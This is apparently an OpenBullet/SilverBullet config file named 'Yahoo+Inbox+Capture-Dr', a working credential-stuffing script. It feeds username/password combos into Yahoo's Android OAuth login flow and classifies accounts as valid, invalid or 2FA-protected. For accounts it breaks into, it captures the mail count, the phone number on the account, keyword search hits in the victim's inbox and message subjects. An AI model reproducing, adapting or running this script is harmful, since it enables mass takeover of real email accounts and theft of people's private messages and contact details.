[SETTINGS]
{
  "Name": "Yahoo+Inbox+Capture-Dr",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-02-26T17:23:04.0116099+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "DrConfiger",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Search For? (If you have Keyword Type it,or no not type anything)",
      "VariableName": "Keyword",
      "Id": 852576241
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Yahoo+Inbox+Capture-Dr",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<USER>" Contains "@yahoo" 
  KEYCHAIN Failure OR 
    KEY "<USER>" DoesNotContain "@yahoo" 

#ua FUNCTION GetRandomUA BROWSER Android -> VAR "ua" 

#Request REQUEST GET "https://api.login.yahoo.com/oauth2/request_auth?appid=com.yahoo.mobile.client.android.mail&appsrcv=6.35.3&src=androidphnx&srcv=8.15.0&intl=xa&language=en-EG&sdk-device-id=ODvJcU64qfwHPjzrw9lT9DnIl5ZIbM00EO7Dbm2kF9GeEaMT6zt1qQ3M&push=1&.asdk_embedded=1&theme=light&redirect_uri=https%3A%2F%2Fapi.login.yahoo.com%2FILokwdqHQAZzHkFZ%2Fcallback%2Fauth&client_id=ILokwdqHQAZzHkFZ&response_type=code&prompt=login&state=SMuezkJyqFS7mCpRCYnZ5A&scope=sdct-w%20mail-w%20sdpp-w%20yfin-w%20sports%20fspt-w%20openid%20device_sso&code_challenge=rUUljxEq9lVsPIi1QAOaj3nH1xHXids56UsKQOjKOCE&code_challenge_method=S256&nonce=aJV7YnyffaA5lToOmU3I0EXCLTIfnQ3X&webview=1" AutoRedirect=FALSE 
  
  HEADER "Host: api.login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: <ua>" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

#Location PARSE "<HEADERS(Location)>" LR "" "" -> VAR "Location" 

#Request REQUEST GET "<Location>" 
  
  HEADER "Host: api.login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: <ua>" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

#crumb PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"crumb\" value=\"" "\" />" -> VAR "crumb" 

#acrumb PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"acrumb\" value=\"" "\" />" -> VAR "acrumb" 

#sessionIndex PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"sessionIndex\" value=\"" "\" />" -> VAR "sessionIndex" 

#POST REQUEST POST "<Location>" 
  CONTENT "crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=&deviceCapability=%7B%22pa%22%3A%7B%22status%22%3Atrue%7D%7D&username=<USER>&passwd=&signin=Next" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: <ua>" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: <Location>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

#KeyCheck KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "error\":\"messages.INVALID_USERNAME" 
    KEY "Sorry, we don't recognize this account" 
  KEYCHAIN Success OR 
    KEY "location\":\"/account/challenge/password" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/account/challenge/push" 
    KEY "/account/challenge/yak-code" 

#Loc2 PARSE "<SOURCE>" LR "{\"location\":\"" "\"}" -> VAR "Loc2" 

#Post REQUEST POST "https://login.yahoo.com<Loc2>" AutoRedirect=FALSE 
  CONTENT "crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=<USER>&deviceCapability=&username=<USER>&passwordContext=normal&isShowButtonClicked=&showButtonStatus=&prefersReducedMotion=&password=<PASS>&verifyPassword=Next" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "User-Agent: <ua>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.yahoo.com<Loc2>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

#KeyCheck2 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Found. Redirecting to <a href=\"/account/challenge/password?" 
  KEYCHAIN Success OR 
    KEY "Found. Redirecting to <a href=\"https://api.login.yahoo.com/oauth2/authorize?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Found. Redirecting to <a href=\"/account/challenge/challenge-selector?" 

#GetHome REQUEST GET "https://mail.yahoo.com/" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CountOFMail PARSE "<SOURCE>" LR "total-count=\"" "\"" CreateEmpty=FALSE -> CAP "CountOFMail" "ils= " "" 

REQUEST GET "https://login.yahoo.com/account/comm-channel/refresh" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#PhoneNu PARSE "<SOURCE>" LR "name=\"editCommChannel\" value=\"phones-" "\"" CreateEmpty=FALSE -> CAP "PhoneNu" 

REQUEST GET "https://data.mail.yahoo.com/psearch/v3/srp?expand=MAIN&query=<Keyword>&appid=YMailNorrin&wssid=" 
  
  HEADER "host: login.yahoo.com" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-requested-with: com.easilydo.mail" 

#wssid PARSE "<SOURCE>" LR "wssid\":\"" "\"" -> VAR "wssid" 

#Emails PARSE "<SOURCE>" LR "totalHits\":" ",\"" CreateEmpty=FALSE -> CAP "Emails" 

REQUEST GET "https://mail.yahoo.com/d/folders/1?guce_referrer=aHR0cHM6Ly9sb2dpbi55YWhvby5jb20v&guce_referrer_sig=AQAAAKftZHN4BmB8JXXejmv2Avsv2BWvW7ZehMXSLOe6pez6eDspcUB3DzAchckh39srFeu3OnMM_-3J-IjvJD4HMIn4_y4NbtAgkFpjDi-pc90Z7Rt_MFwkstlZ-NzG7xlRI32vYKBeDLH13LvrYCtr-d7dP7MwtEUsdcHyYxzhl7FD" 
  
  HEADER "Host: mail.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 

#Messages PARSE "<SOURCE>" LR "<strong class=\"u_Z13VSE6\">" "</strong>" Recursive=TRUE CreateEmpty=FALSE -> CAP "Messages" 

